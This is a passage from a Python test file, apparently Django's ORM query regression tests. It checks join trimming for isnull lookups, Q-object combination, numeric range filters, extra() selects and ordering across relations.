    # Querying direct fields with isnull should trim the left outer join.
    # It also should not create INNER JOIN.
    q = Tag.objects.filter(parent__isnull=True)
    self.assertQuerysetEqual(q, ['<Tag: t1>'])
    self.assertNotIn('JOIN', str(q.query))
    q = Tag.objects.filter(parent__isnull=False)
    self.assertQuerysetEqual(
        q,
        ['<Tag: t2>', '<Tag: t3>', '<Tag: t4>', '<Tag: t5>'],
    )
    self.assertNotIn('JOIN', str(q.query))
    # exclude() of the same lookups is also join-free.
    q = Tag.objects.exclude(parent__isnull=True)
    self.assertQuerysetEqual(
        q,
        ['<Tag: t2>', '<Tag: t3>', '<Tag: t4>', '<Tag: t5>'],
    )
    self.assertNotIn('JOIN', str(q.query))
    q = Tag.objects.exclude(parent__isnull=False)
    self.assertQuerysetEqual(q, ['<Tag: t1>'])
    self.assertNotIn('JOIN', str(q.query))
    # A two-level exclude keeps exactly one LEFT OUTER JOIN and no INNER.
    q = Tag.objects.exclude(parent__parent__isnull=False)
    self.assertQuerysetEqual(
        q,
        ['<Tag: t1>', '<Tag: t2>', '<Tag: t3>'],
    )
    self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 1)
    self.assertNotIn('INNER JOIN', str(q.query))
def test_ticket_10790_2(self):
    """Only the last join of a multi-table isnull lookup is trimmed."""
    # Querying across several tables should strip only the last outer join,
    # while preserving the preceding inner joins.
    q = Tag.objects.filter(parent__parent__isnull=False)
    self.assertQuerysetEqual(
        q,
        ['<Tag: t4>', '<Tag: t5>'],
    )
    self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
    self.assertEqual(str(q.query).count('INNER JOIN'), 1)
    # Querying without isnull should not convert anything to left outer join.
    q = Tag.objects.filter(parent__parent=self.t1)
    self.assertQuerysetEqual(
        q,
        ['<Tag: t4>', '<Tag: t5>'],
    )
    self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
    self.assertEqual(str(q.query).count('INNER JOIN'), 1)
def test_ticket_10790_3(self):
    """Reverse-relation isnull lookups keep their LEFT OUTER JOIN."""
    # Querying via indirect fields should populate the left outer join
    q = NamedCategory.objects.filter(tag__isnull=True)
    self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 1)
    # join to dumbcategory ptr_id
    self.assertEqual(str(q.query).count('INNER JOIN'), 1)
    self.assertQuerysetEqual(q, [])
    # Querying across several tables should strip only the last join, while
    # preserving the preceding left outer joins.
    q = NamedCategory.objects.filter(tag__parent__isnull=True)
    self.assertEqual(str(q.query).count('INNER JOIN'), 1)
    self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 1)
    self.assertQuerysetEqual(q, ['<NamedCategory: Generic>'])
def test_ticket_10790_4(self):
    """isnull across an m2m relation keeps the m2m through-table joins."""
    # Querying across m2m field should not strip the m2m table from join.
    q = Author.objects.filter(item__tags__isnull=True)
    self.assertQuerysetEqual(
        q,
        ['<Author: a2>', '<Author: a3>'],
    )
    self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 2)
    self.assertNotIn('INNER JOIN', str(q.query))
    # One level deeper adds one more LEFT OUTER JOIN.
    q = Author.objects.filter(item__tags__parent__isnull=True)
    self.assertQuerysetEqual(
        q,
        ['<Author: a1>', '<Author: a2>', '<Author: a2>', '<Author: a3>'],
    )
    self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 3)
    self.assertNotIn('INNER JOIN', str(q.query))
def test_ticket_10790_5(self):
    """isnull=False across an m2m relation uses only INNER JOINs."""
    # Querying with isnull=False across m2m field should not create outer joins
    q = Author.objects.filter(item__tags__isnull=False)
    self.assertQuerysetEqual(
        q,
        ['<Author: a1>', '<Author: a1>', '<Author: a2>', '<Author: a2>', '<Author: a4>']
    )
    self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
    self.assertEqual(str(q.query).count('INNER JOIN'), 2)
    # Each extra relation level adds one INNER JOIN.
    q = Author.objects.filter(item__tags__parent__isnull=False)
    self.assertQuerysetEqual(
        q,
        ['<Author: a1>', '<Author: a2>', '<Author: a4>']
    )
    self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
    self.assertEqual(str(q.query).count('INNER JOIN'), 3)
    q = Author.objects.filter(item__tags__parent__parent__isnull=False)
    self.assertQuerysetEqual(
        q,
        ['<Author: a4>']
    )
    self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
    self.assertEqual(str(q.query).count('INNER JOIN'), 4)
def test_ticket_10790_6(self):
    """isnull=True across an m2m relation uses only LEFT OUTER JOINs."""
    # Querying with isnull=True across m2m field should not create inner joins
    # and strip last outer join
    q = Author.objects.filter(item__tags__parent__parent__isnull=True)
    self.assertQuerysetEqual(
        q,
        ['<Author: a1>', '<Author: a1>', '<Author: a2>', '<Author: a2>',
         '<Author: a2>', '<Author: a3>']
    )
    self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 4)
    self.assertEqual(str(q.query).count('INNER JOIN'), 0)
    # One relation level less means one LEFT OUTER JOIN less.
    q = Author.objects.filter(item__tags__parent__isnull=True)
    self.assertQuerysetEqual(
        q,
        ['<Author: a1>', '<Author: a2>', '<Author: a2>', '<Author: a3>']
    )
    self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 3)
    self.assertEqual(str(q.query).count('INNER JOIN'), 0)
def test_ticket_10790_7(self):
    """Reverse-FK isnull lookups keep exactly the join they need."""
    # Reverse querying with isnull should not strip the join
    q = Author.objects.filter(item__isnull=True)
    self.assertQuerysetEqual(
        q,
        ['<Author: a3>']
    )
    self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 1)
    self.assertEqual(str(q.query).count('INNER JOIN'), 0)
    # isnull=False over the same relation uses an INNER JOIN instead.
    q = Author.objects.filter(item__isnull=False)
    self.assertQuerysetEqual(
        q,
        ['<Author: a1>', '<Author: a2>', '<Author: a2>', '<Author: a4>']
    )
    self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
    self.assertEqual(str(q.query).count('INNER JOIN'), 1)
def test_ticket_10790_8(self):
    """A combined Q over the same nullable FK still needs no join."""
    # Querying with combined q-objects should also strip the left outer join
    q = Tag.objects.filter(Q(parent__isnull=True) | Q(parent=self.t1))
    self.assertQuerysetEqual(
        q,
        ['<Tag: t1>', '<Tag: t2>', '<Tag: t3>']
    )
    self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
    self.assertEqual(str(q.query).count('INNER JOIN'), 0)
def test_ticket_10790_combine(self):
    """Combining querysets with | and & must not re-add trimmed joins."""
    # Combining queries should not re-populate the left outer join
    q1 = Tag.objects.filter(parent__isnull=True)
    q2 = Tag.objects.filter(parent__isnull=False)
    q3 = q1 | q2
    self.assertQuerysetEqual(
        q3,
        ['<Tag: t1>', '<Tag: t2>', '<Tag: t3>', '<Tag: t4>', '<Tag: t5>'],
    )
    self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 0)
    self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
    # The intersection of the two isnull conditions is empty, still join-free.
    q3 = q1 & q2
    self.assertQuerysetEqual(q3, [])
    self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 0)
    self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
    q2 = Tag.objects.filter(parent=self.t1)
    q3 = q1 | q2
    self.assertQuerysetEqual(
        q3,
        ['<Tag: t1>', '<Tag: t2>', '<Tag: t3>']
    )
    self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 0)
    self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
    # The same union with its operands swapped behaves identically.
    q3 = q2 | q1
    self.assertQuerysetEqual(
        q3,
        ['<Tag: t1>', '<Tag: t2>', '<Tag: t3>']
    )
    self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 0)
    self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
    # A two-level isnull operand contributes exactly one LEFT OUTER JOIN.
    q1 = Tag.objects.filter(parent__isnull=True)
    q2 = Tag.objects.filter(parent__parent__isnull=True)
    q3 = q1 | q2
    self.assertQuerysetEqual(
        q3,
        ['<Tag: t1>', '<Tag: t2>', '<Tag: t3>']
    )
    self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 1)
    self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
    q3 = q2 | q1
    self.assertQuerysetEqual(
        q3,
        ['<Tag: t1>', '<Tag: t2>', '<Tag: t3>']
    )
    self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 1)
    self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
def test_ticket19672(self):
    """A negated lookup AND-ed with an isnull filter across a nullable FK."""
    condition = Q(creator__isnull=False) & ~Q(creator__extra__value=41)
    self.assertQuerysetEqual(
        Report.objects.filter(condition),
        ['<Report: r1>']
    )
def test_ticket_20250(self):
    # A negated Q along with an annotated queryset failed in Django 1.4
    qs = Author.objects.annotate(Count('item'))
    qs = qs.filter(~Q(extra__value=0))
    # Rendering the SQL must not blow up...
    self.assertIn('SELECT', str(qs.query))
    # ...and the negated condition must not drop any authors.
    self.assertQuerysetEqual(
        qs,
        ['<Author: a1>', '<Author: a2>', '<Author: a3>', '<Author: a4>']
    )
def test_lookup_constraint_fielderror(self):
    """Unknown lookup fields raise a FieldError listing the valid choices."""
    expected_msg = (
        "Cannot resolve keyword 'unknown_field' into field. Choices are: "
        "annotation, category, category_id, children, id, item, "
        "managedmodel, name, parent, parent_id"
    )
    with self.assertRaisesMessage(FieldError, expected_msg):
        Tag.objects.filter(unknown_field__name='generic')
class Queries2Tests(TestCase):
    """Numeric lookup edge cases against a three-row Number table."""
    @classmethod
    def setUpTestData(cls):
        # Three fixed values so the boundary tests below are deterministic.
        Number.objects.create(num=4)
        Number.objects.create(num=8)
        Number.objects.create(num=12)
    def test_ticket4289(self):
        """Range conditions combined with AND/OR keep their boundaries."""
        # A slight variation on the restricting the filtering choices by the
        # lookup constraints.
        self.assertQuerysetEqual(Number.objects.filter(num__lt=4), [])
        self.assertQuerysetEqual(Number.objects.filter(num__gt=8, num__lt=12), [])
        self.assertQuerysetEqual(
            Number.objects.filter(num__gt=8, num__lt=13),
            ['<Number: 12>']
        )
        self.assertQuerysetEqual(
            Number.objects.filter(Q(num__lt=4) | Q(num__gt=8, num__lt=12)),
            []
        )
        self.assertQuerysetEqual(
            Number.objects.filter(Q(num__gt=8, num__lt=12) | Q(num__lt=4)),
            []
        )
        self.assertQuerysetEqual(
            Number.objects.filter(Q(num__gt=8) & Q(num__lt=12) | Q(num__lt=4)),
            []
        )
        self.assertQuerysetEqual(
            Number.objects.filter(Q(num__gt=7) & Q(num__lt=12) | Q(num__lt=4)),
            ['<Number: 8>']
        )
    def test_ticket12239(self):
        """Float comparison values on an integer field must not be rounded."""
        # Float was being rounded to integer on gte queries on integer field. Tests
        # show that gt, lt, gte, and lte work as desired. Note that the fix changes
        # get_prep_lookup for gte and lt queries only.
        self.assertQuerysetEqual(
            Number.objects.filter(num__gt=11.9),
            ['<Number: 12>']
        )
        self.assertQuerysetEqual(Number.objects.filter(num__gt=12), [])
        self.assertQuerysetEqual(Number.objects.filter(num__gt=12.0), [])
        self.assertQuerysetEqual(Number.objects.filter(num__gt=12.1), [])
        self.assertQuerysetEqual(
            Number.objects.filter(num__lt=12),
            ['<Number: 4>', '<Number: 8>'],
            ordered=False
        )
        self.assertQuerysetEqual(
            Number.objects.filter(num__lt=12.0),
            ['<Number: 4>', '<Number: 8>'],
            ordered=False
        )
        self.assertQuerysetEqual(
            Number.objects.filter(num__lt=12.1),
            ['<Number: 4>', '<Number: 8>', '<Number: 12>'],
            ordered=False
        )
        self.assertQuerysetEqual(
            Number.objects.filter(num__gte=11.9),
            ['<Number: 12>']
        )
        self.assertQuerysetEqual(
            Number.objects.filter(num__gte=12),
            ['<Number: 12>']
        )
        self.assertQuerysetEqual(
            Number.objects.filter(num__gte=12.0),
            ['<Number: 12>']
        )
        self.assertQuerysetEqual(Number.objects.filter(num__gte=12.1), [])
        self.assertQuerysetEqual(Number.objects.filter(num__gte=12.9), [])
        self.assertQuerysetEqual(
            Number.objects.filter(num__lte=11.9),
            ['<Number: 4>', '<Number: 8>'],
            ordered=False
        )
        self.assertQuerysetEqual(
            Number.objects.filter(num__lte=12),
            ['<Number: 4>', '<Number: 8>', '<Number: 12>'],
            ordered=False
        )
        self.assertQuerysetEqual(
            Number.objects.filter(num__lte=12.0),
            ['<Number: 4>', '<Number: 8>', '<Number: 12>'],
            ordered=False
        )
        self.assertQuerysetEqual(
            Number.objects.filter(num__lte=12.1),
            ['<Number: 4>', '<Number: 8>', '<Number: 12>'],
            ordered=False
        )
        self.assertQuerysetEqual(
            Number.objects.filter(num__lte=12.9),
            ['<Number: 4>', '<Number: 8>', '<Number: 12>'],
            ordered=False
        )
    def test_ticket7759(self):
        # Count should work with a partially read result set.
        count = Number.objects.count()
        qs = Number.objects.all()
        def run():
            # Issue count() while iteration of ``qs`` is still in progress.
            for obj in qs:
                return qs.count() == count
        self.assertTrue(run())
class Queries3Tests(BaseQuerysetTest):
    def test_ticket7107(self):
        # Evaluating a queryset over this model's self-referential setup
        # must not create an infinite loop (refs #7107).
        self.assertQuerysetEqual(Valid.objects.all(), [])

    def test_ticket8683(self):
        # datetimes() raises a proper error when handed a field that is not
        # a DateTimeField (refs #8683).
        with self.assertRaisesMessage(AssertionError,
                "'name' isn't a DateTimeField."):
            Item.objects.datetimes('name', 'month')

    def test_ticket22023(self):
        # only()/defer() are rejected after values()/values_list()
        # (refs #22023).
        with self.assertRaisesMessage(TypeError,
                "Cannot call only() after .values() or .values_list()"):
            Valid.objects.values().only()

        with self.assertRaisesMessage(TypeError,
                "Cannot call defer() after .values() or .values_list()"):
            Valid.objects.values().defer()
class Queries4Tests(BaseQuerysetTest):
    @classmethod
    def setUpTestData(cls):
        generic = NamedCategory.objects.create(name="Generic")
        cls.t1 = Tag.objects.create(name='t1', category=generic)

        n1 = Note.objects.create(note='n1', misc='foo', id=1)
        n2 = Note.objects.create(note='n2', misc='bar', id=2)

        e1 = ExtraInfo.objects.create(info='e1', note=n1)
        e2 = ExtraInfo.objects.create(info='e2', note=n2)

        cls.a1 = Author.objects.create(name='a1', num=1001, extra=e1)
        cls.a3 = Author.objects.create(name='a3', num=3003, extra=e2)

        cls.r1 = Report.objects.create(name='r1', creator=cls.a1)
        cls.r2 = Report.objects.create(name='r2', creator=cls.a3)
        cls.r3 = Report.objects.create(name='r3')  # deliberately creator-less

        Item.objects.create(name='i1', created=datetime.datetime.now(), note=n1, creator=cls.a1)
        Item.objects.create(name='i2', created=datetime.datetime.now(), note=n1, creator=cls.a3)

    def _create_special_category_items(self):
        """Create one plain and two special categories, each with one
        CategoryItem; return the three items in creation order (the first
        item's category is the plain one).

        Shared fixture for the test_ticket15316_* variants, which
        previously duplicated this setup verbatim.
        """
        c1 = SimpleCategory.objects.create(name="category1")
        c2 = SpecialCategory.objects.create(name="named category1",
                                            special_name="special1")
        c3 = SpecialCategory.objects.create(name="named category2",
                                            special_name="special2")
        return (
            CategoryItem.objects.create(category=c1),
            CategoryItem.objects.create(category=c2),
            CategoryItem.objects.create(category=c3),
        )

    def _create_one2one_category_items(self):
        """Create three categories, the last two of which get a
        OneToOneCategory; return the three CategoryItems in creation order
        (the first item's category has no OneToOneCategory).

        Shared fixture for the test_ticket15316_one2one_* variants.
        """
        c = SimpleCategory.objects.create(name="cat")
        c0 = SimpleCategory.objects.create(name="cat0")
        c1 = SimpleCategory.objects.create(name="category1")

        OneToOneCategory.objects.create(category=c1, new_name="new1")
        OneToOneCategory.objects.create(category=c0, new_name="new2")

        return (
            CategoryItem.objects.create(category=c),
            CategoryItem.objects.create(category=c0),
            CategoryItem.objects.create(category=c1),
        )

    def test_ticket11811(self):
        # An unsaved instance cannot be used as the value in an update().
        unsaved_category = NamedCategory(name="Other")
        with six.assertRaisesRegex(self, ValueError,
                'Unsaved model instance <NamedCategory: Other> '
                'cannot be used in an ORM query.'):
            Tag.objects.filter(pk=self.t1.pk).update(category=unsaved_category)

    def test_ticket14876(self):
        # Note: when combining the query we need to have information available
        # about the join type of the trimmed "creator__isnull" join. If we
        # don't have that information, then the join is created as INNER JOIN
        # and results will be incorrect.
        q1 = Report.objects.filter(Q(creator__isnull=True) | Q(creator__extra__info='e1'))
        q2 = Report.objects.filter(Q(creator__isnull=True)) | Report.objects.filter(Q(creator__extra__info='e1'))
        self.assertQuerysetEqual(q1, ["<Report: r1>", "<Report: r3>"], ordered=False)
        self.assertEqual(str(q1.query), str(q2.query))

        q1 = Report.objects.filter(Q(creator__extra__info='e1') | Q(creator__isnull=True))
        q2 = Report.objects.filter(Q(creator__extra__info='e1')) | Report.objects.filter(Q(creator__isnull=True))
        self.assertQuerysetEqual(q1, ["<Report: r1>", "<Report: r3>"], ordered=False)
        self.assertEqual(str(q1.query), str(q2.query))

        q1 = Item.objects.filter(Q(creator=self.a1) | Q(creator__report__name='r1')).order_by()
        q2 = Item.objects.filter(Q(creator=self.a1)).order_by() | Item.objects.filter(Q(creator__report__name='r1')).order_by()
        self.assertQuerysetEqual(q1, ["<Item: i1>"])
        self.assertEqual(str(q1.query), str(q2.query))

        q1 = Item.objects.filter(Q(creator__report__name='e1') | Q(creator=self.a1)).order_by()
        q2 = Item.objects.filter(Q(creator__report__name='e1')).order_by() | Item.objects.filter(Q(creator=self.a1)).order_by()
        self.assertQuerysetEqual(q1, ["<Item: i1>"])
        self.assertEqual(str(q1.query), str(q2.query))

    def test_combine_join_reuse(self):
        # Test that we correctly recreate joins having identical connections
        # in the rhs query, in case the query is ORed together. Related to
        # ticket #18748
        Report.objects.create(name='r4', creator=self.a1)
        q1 = Author.objects.filter(report__name='r5')
        q2 = Author.objects.filter(report__name='r4').filter(report__name='r1')
        combined = q1 | q2
        self.assertEqual(str(combined.query).count('JOIN'), 2)
        self.assertEqual(len(combined), 1)
        self.assertEqual(combined[0].name, 'a1')

    def test_ticket7095(self):
        # Updates that are filtered on the model being updated are somewhat
        # tricky in MySQL. This exercises that case.
        ManagedModel.objects.create(data='mm1', tag=self.t1, public=True)
        self.assertEqual(ManagedModel.objects.update(data='mm'), 1)

        # A values() or values_list() query across joined models must use outer
        # joins appropriately.
        # Note: In Oracle, we expect a null CharField to return '' instead of
        # None.
        if connection.features.interprets_empty_strings_as_nulls:
            expected_null_charfield_repr = ''
        else:
            expected_null_charfield_repr = None
        self.assertValueQuerysetEqual(
            Report.objects.values_list("creator__extra__info", flat=True).order_by("name"),
            ['e1', 'e2', expected_null_charfield_repr],
        )

        # Similarly for select_related(), joins beyond an initial nullable join
        # must use outer joins so that all results are included.
        self.assertQuerysetEqual(
            Report.objects.select_related("creator", "creator__extra").order_by("name"),
            ['<Report: r1>', '<Report: r2>', '<Report: r3>']
        )

        # When there are multiple paths to a table from another table, we have
        # to be careful not to accidentally reuse an inappropriate join when
        # using select_related(). We used to return the parent's Detail record
        # here by mistake.
        d1 = Detail.objects.create(data="d1")
        d2 = Detail.objects.create(data="d2")
        m1 = Member.objects.create(name="m1", details=d1)
        m2 = Member.objects.create(name="m2", details=d2)
        Child.objects.create(person=m2, parent=m1)
        obj = m1.children.select_related("person__details")[0]
        self.assertEqual(obj.person.details.data, 'd2')

    def test_order_by_resetting(self):
        # Calling order_by() with no parameters removes any existing ordering on the
        # model. But it should still be possible to add new ordering after that.
        qs = Author.objects.order_by().order_by('name')
        self.assertIn('ORDER BY', qs.query.get_compiler(qs.db).as_sql()[0])

    def test_order_by_reverse_fk(self):
        # It is possible to order by reverse of foreign key, although that can lead
        # to duplicate results.
        c1 = SimpleCategory.objects.create(name="category1")
        c2 = SimpleCategory.objects.create(name="category2")
        CategoryItem.objects.create(category=c1)
        CategoryItem.objects.create(category=c2)
        CategoryItem.objects.create(category=c1)
        self.assertQuerysetEqual(
            SimpleCategory.objects.order_by('categoryitem', 'pk'),
            [c1, c2, c1], lambda x: x)

    def test_ticket10181(self):
        # Avoid raising an EmptyResultSet if an inner query is probably
        # empty (and hence, not executed).
        self.assertQuerysetEqual(
            Tag.objects.filter(id__in=Tag.objects.filter(id__in=[])),
            []
        )

    def test_ticket15316_filter_false(self):
        _, ci2, ci3 = self._create_special_category_items()
        qs = CategoryItem.objects.filter(category__specialcategory__isnull=False)
        self.assertEqual(qs.count(), 2)
        self.assertQuerysetEqual(qs, [ci2.pk, ci3.pk], lambda x: x.pk, False)

    def test_ticket15316_exclude_false(self):
        ci1, _, _ = self._create_special_category_items()
        qs = CategoryItem.objects.exclude(category__specialcategory__isnull=False)
        self.assertEqual(qs.count(), 1)
        self.assertQuerysetEqual(qs, [ci1.pk], lambda x: x.pk)

    def test_ticket15316_filter_true(self):
        ci1, _, _ = self._create_special_category_items()
        qs = CategoryItem.objects.filter(category__specialcategory__isnull=True)
        self.assertEqual(qs.count(), 1)
        self.assertQuerysetEqual(qs, [ci1.pk], lambda x: x.pk)

    def test_ticket15316_exclude_true(self):
        _, ci2, ci3 = self._create_special_category_items()
        qs = CategoryItem.objects.exclude(category__specialcategory__isnull=True)
        self.assertEqual(qs.count(), 2)
        self.assertQuerysetEqual(qs, [ci2.pk, ci3.pk], lambda x: x.pk, False)

    def test_ticket15316_one2one_filter_false(self):
        _, ci2, ci3 = self._create_one2one_category_items()
        qs = CategoryItem.objects.filter(category__onetoonecategory__isnull=False)
        self.assertEqual(qs.count(), 2)
        self.assertQuerysetEqual(qs, [ci2.pk, ci3.pk], lambda x: x.pk, False)

    def test_ticket15316_one2one_exclude_false(self):
        ci1, _, _ = self._create_one2one_category_items()
        qs = CategoryItem.objects.exclude(category__onetoonecategory__isnull=False)
        self.assertEqual(qs.count(), 1)
        self.assertQuerysetEqual(qs, [ci1.pk], lambda x: x.pk)

    def test_ticket15316_one2one_filter_true(self):
        ci1, _, _ = self._create_one2one_category_items()
        qs = CategoryItem.objects.filter(category__onetoonecategory__isnull=True)
        self.assertEqual(qs.count(), 1)
        self.assertQuerysetEqual(qs, [ci1.pk], lambda x: x.pk)

    def test_ticket15316_one2one_exclude_true(self):
        _, ci2, ci3 = self._create_one2one_category_items()
        qs = CategoryItem.objects.exclude(category__onetoonecategory__isnull=True)
        self.assertEqual(qs.count(), 2)
        self.assertQuerysetEqual(qs, [ci2.pk, ci3.pk], lambda x: x.pk, False)
class Queries5Tests(TestCase):
    @classmethod
    def setUpTestData(cls):
        # Ordering by 'rank' gives us rank2, rank1, rank3. Ordering by the
        # Meta.ordering will be rank3, rank2, rank1.
        n1 = Note.objects.create(note='n1', misc='foo', id=1)
        n2 = Note.objects.create(note='n2', misc='bar', id=2)
        e1 = ExtraInfo.objects.create(info='e1', note=n1)
        e2 = ExtraInfo.objects.create(info='e2', note=n2)
        a1 = Author.objects.create(name='a1', num=1001, extra=e1)
        a2 = Author.objects.create(name='a2', num=2002, extra=e1)
        a3 = Author.objects.create(name='a3', num=3003, extra=e2)
        cls.rank1 = Ranking.objects.create(rank=2, author=a2)
        Ranking.objects.create(rank=1, author=a3)
        Ranking.objects.create(rank=3, author=a1)

    def test_ordering(self):
        # Cross model ordering is possible in Meta, too.
        self.assertQuerysetEqual(
            Ranking.objects.all(),
            ['<Ranking: 3: a1>', '<Ranking: 2: a2>', '<Ranking: 1: a3>']
        )
        self.assertQuerysetEqual(
            Ranking.objects.all().order_by('rank'),
            ['<Ranking: 1: a3>', '<Ranking: 2: a2>', '<Ranking: 3: a1>']
        )

        # Ordering of extra() pieces is possible, too and you can mix extra
        # fields and model fields in the ordering.
        self.assertQuerysetEqual(
            Ranking.objects.extra(tables=['django_site'], order_by=['-django_site.id', 'rank']),
            ['<Ranking: 1: a3>', '<Ranking: 2: a2>', '<Ranking: 3: a1>']
        )

        # 'good' is a computed extra column: 1 for rank > 2, else 0.
        qs = Ranking.objects.extra(select={'good': 'case when rank > 2 then 1 else 0 end'})
        self.assertEqual(
            [o.good for o in qs.extra(order_by=('-good',))],
            [True, False, False]
        )
        self.assertQuerysetEqual(
            qs.extra(order_by=('-good', 'id')),
            ['<Ranking: 3: a1>', '<Ranking: 2: a2>', '<Ranking: 1: a3>']
        )

        # Despite having some extra aliases in the query, we can still omit
        # them in a values() query.
        dicts = qs.values('id', 'rank').order_by('id')
        self.assertEqual(
            [d['rank'] for d in dicts],
            [2, 1, 3]
        )

    def test_ticket7256(self):
        # An empty values() call includes all aliases, including those from an
        # extra()
        qs = Ranking.objects.extra(select={'good': 'case when rank > 2 then 1 else 0 end'})
        dicts = qs.values().order_by('id')
        for d in dicts:
            # Drop the pk-dependent keys so the comparison below is stable.
            del d['id']
            del d['author_id']
        self.assertEqual(
            [sorted(d.items()) for d in dicts],
            [[('good', 0), ('rank', 2)], [('good', 0), ('rank', 1)], [('good', 1), ('rank', 3)]]
        )

    def test_ticket7045(self):
        # Extra tables used to crash SQL construction on the second use.
        qs = Ranking.objects.extra(tables=['django_site'])
        qs.query.get_compiler(qs.db).as_sql()
        # test passes if this doesn't raise an exception.
        qs.query.get_compiler(qs.db).as_sql()

    def test_ticket9848(self):
        # Make sure that updates which only filter on sub-tables don't
        # inadvertently update the wrong records (bug #9848).

        # Make sure that the IDs from different tables don't happen to match.
        self.assertQuerysetEqual(
            Ranking.objects.filter(author__name='a1'),
            ['<Ranking: 3: a1>']
        )
        self.assertEqual(
            Ranking.objects.filter(author__name='a1').update(rank='4'),
            1
        )
        r = Ranking.objects.filter(author__name='a1')[0]
        self.assertNotEqual(r.id, r.author.id)
        self.assertEqual(r.rank, 4)
        # Restore the original rank so the Meta-ordered listing below holds.
        r.rank = 3
        r.save()
        self.assertQuerysetEqual(
            Ranking.objects.all(),
            ['<Ranking: 3: a1>', '<Ranking: 2: a2>', '<Ranking: 1: a3>']
        )

    def test_ticket5261(self):
        # Test different empty excludes: an empty Q() (and combinations of
        # negated empty Qs) must not filter anything out.
        self.assertQuerysetEqual(
            Note.objects.exclude(Q()),
            ['<Note: n1>', '<Note: n2>']
        )
        self.assertQuerysetEqual(
            Note.objects.filter(~Q()),
            ['<Note: n1>', '<Note: n2>']
        )
        self.assertQuerysetEqual(
            Note.objects.filter(~Q() | ~Q()),
            ['<Note: n1>', '<Note: n2>']
        )
        self.assertQuerysetEqual(
            Note.objects.exclude(~Q() & ~Q()),
            ['<Note: n1>', '<Note: n2>']
        )

    def test_extra_select_literal_percent_s(self):
        # Allow %%s to escape select clauses
        self.assertEqual(
            Note.objects.extra(select={'foo': "'%%s'"})[0].foo,
            '%s'
        )
        self.assertEqual(
            Note.objects.extra(select={'foo': "'%%s bar %%s'"})[0].foo,
            '%s bar %s'
        )
        self.assertEqual(
            Note.objects.extra(select={'foo': "'bar %%s'"})[0].foo,
            'bar %s'
        )
class SelectRelatedTests(TestCase):
    def test_tickets_3045_3288(self):
        # select_related() over circular relations used to loop forever when
        # no "depth" was specified; an arbitrary default upper bound is now
        # applied instead (refs #3045, #3288).
        for queryset in (X.objects.all(), X.objects.select_related()):
            self.assertQuerysetEqual(queryset, [])
class SubclassFKTests(TestCase):
    def test_ticket7778(self):
        # A model subclass instance can be deleted even when a nullable
        # foreign key relates to a model that relates back (refs #7778).
        initial_count = Celebrity.objects.count()
        chef = TvChef.objects.create(name="Huey")
        self.assertEqual(Celebrity.objects.count(), initial_count + 1)

        for _ in range(2):
            Fan.objects.create(fan_of=chef)

        chef.delete()
        # Deleting the child row removes the parent row as well.
        self.assertEqual(Celebrity.objects.count(), initial_count)
class CustomPkTests(TestCase):
    def test_ticket7371(self):
        # Ordering by a custom primary key column works (refs #7371).
        ordered = Related.objects.order_by('custom')
        self.assertQuerysetEqual(ordered, [])
class NullableRelOrderingTests(TestCase):
    def test_ticket10028(self):
        # Ordering by model related to nullable relations(!) should use outer
        # joins, so that all results are included.
        Plaything.objects.create(name="p1")
        self.assertQuerysetEqual(
            Plaything.objects.all(),
            ['<Plaything: p1>']
        )

    def test_join_already_in_query(self):
        # Ordering by model related to nullable relations should not change
        # the join type of already existing joins.
        Plaything.objects.create(name="p1")
        s = SingleObject.objects.create(name='s')
        r = RelatedObject.objects.create(single=s, f=1)
        Plaything.objects.create(name="p2", others=r)
        # isnull on the FK itself needs no join at all.
        qs = Plaything.objects.all().filter(others__isnull=False).order_by('pk')
        self.assertNotIn('JOIN', str(qs.query))
        # Filtering through the relation forces an INNER join.
        qs = Plaything.objects.all().filter(others__f__isnull=False).order_by('pk')
        self.assertIn('INNER', str(qs.query))
        qs = qs.order_by('others__single__name')
        # The ordering by others__single__pk will add one new join (to single)
        # and that join must be LEFT join. The already existing join to related
        # objects must be kept INNER. So, we have both an INNER and a LEFT join
        # in the query.
        self.assertEqual(str(qs.query).count('LEFT'), 1)
        self.assertEqual(str(qs.query).count('INNER'), 1)
        self.assertQuerysetEqual(
            qs,
            ['<Plaything: p2>']
        )
class DisjunctiveFilterTests(TestCase):
    @classmethod
    def setUpTestData(cls):
        cls.n1 = Note.objects.create(note='n1', misc='foo', id=1)
        ExtraInfo.objects.create(info='e1', note=cls.n1)

    def test_ticket7872(self):
        # Another variation on the disjunctive filtering theme: a filter
        # crossing a relation for which no related row exists still finds
        # the directly matching object. For the purposes of this regression
        # test, it's important that there is no Join object related to the
        # LeafA we create.
        LeafA.objects.create(data='first')
        self.assertQuerysetEqual(LeafA.objects.all(), ['<LeafA: first>'])

        disjunction = Q(data='first') | Q(join__b__data='second')
        self.assertQuerysetEqual(
            LeafA.objects.filter(disjunction), ['<LeafA: first>'])

    def test_ticket8283(self):
        # Applying further filters after OR-combining two querysets works
        # correctly, regardless of the order of the operands.
        by_note = ExtraInfo.objects.filter(note=self.n1)
        by_info = ExtraInfo.objects.filter(info='e2')

        note_first = (by_note | by_info).filter(note=self.n1)
        self.assertQuerysetEqual(note_first, ['<ExtraInfo: e1>'])

